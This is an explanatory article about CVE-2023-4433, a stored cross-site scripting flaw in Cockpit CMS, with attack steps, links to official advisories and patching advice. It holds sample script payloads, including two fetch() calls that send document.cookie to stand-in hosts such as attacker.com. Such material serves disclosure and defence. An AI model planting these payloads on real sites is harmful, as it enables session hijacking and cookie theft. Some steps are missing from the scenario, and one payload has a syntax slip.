A critical vulnerability—CVE-2023-4433—was found in Cockpit CMS, a popular open source content management system, prior to version 2.6.4. This flaw allows attackers to store malicious scripts (JavaScript) that will be executed in the browsers of logged-in users, leading to a Stored Cross-site Scripting (Stored XSS) attack.
This long read will explain the vulnerability for anyone, show how it can be exploited, and guide you to patching and protecting your websites. We'll use simple, clear language, with code examples for testing, and links to official resources.
What is Stored Cross-site Scripting (XSS)?
Cross-site scripting (XSS) is a vulnerability that lets attackers inject their own code (usually JavaScript) into web pages viewed by others. Stored XSS happens when an application stores the dangerous code in the database—say, in a post, a comment, or a field—so that it is shown to all users later.
If you are an admin on Cockpit CMS, and someone manages to add a script in a 'collection' or field, your browser could run their code whenever you view that data.
The Vulnerability: Where Was the XSS?
In versions before 2.6.4, Cockpit CMS didn't properly sanitize user-supplied input in certain fields—particularly, Collections—allowing unsanitized HTML/JavaScript to be saved and rendered automatically in the backend.
This means, for example, if you created a new collection or entry and gave one of its fields this value:
<script>alert('XSS!')</script>
Anyone—especially an admin—who browsed to view or edit that entry would have the script pop up in their browser.
Let’s walk through a possible attack scenario
1. Attacker registers or gets access to Cockpit CMS (e.g., low-privileged user or through social engineering).
Payload is stored in the Cockpit CMS database, as there’s no input validation or sanitization.
4. Admin browses to the entry to view/edit it.
5. Malicious JavaScript runs in the admin’s browser. Now the attacker might steal cookies, perform actions as the admin, or install further backdoors.
Let's see how we could perform this attack in the wild (for ethical testing)
Step 1: Create a collection with a field you can control. <br>Step 2: Add this entry:
<script>alert('Hacked via CVE-2023-4433');</script>
Step 3: When any user opens the collection list or entry, they see
Or, to exfiltrate data
<script>
fetch('https://attacker.com/steal?session='+document.cookie)
</script>
The classic stored XSS payload looks like this
<script>alert(document.domain)</script>
A more dangerous one might be
<script>
// Send admin cookies to evil server
fetch('https://evil.example.com/xss?c='; + encodeURIComponent(document.cookie))
</script>
Cockpit CMS Repository:
https://github.com/cockpit-hq/cockpit
CVE Entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4433
NVD Details:
https://nvd.nist.gov/vuln/detail/CVE-2023-4433
Security Advisory:
GitHub Security Advisory - GHSA-25wx-qx89-cv8w
- Relevant Patch/Commit:
Sanitize HTML in collections
Mitigation and Fix
If you use Cockpit CMS, update to version 2.6.4 or later immediately.
This was fixed in this commit by sanitizing user inputs and filtering dangerous code.
Additional security tips
- Limit the ability to add/edit collections to trusted users only.
Final Thoughts
Stored XSS vulnerabilities like CVE-2023-4433 can have serious impacts: stealing cookies, capturing credentials, or even hijacking admin sessions. If you run your site on Cockpit CMS, check your version now, and urge your administrators to patch immediately.
Testing this on your own site? Always use your own environment—never target third-parties. Security is strongest when we all help each other.
Timeline
Published on: 08/19/2023 01:15:00 UTC
Last modified on: 08/23/2023 16:58:00 UTC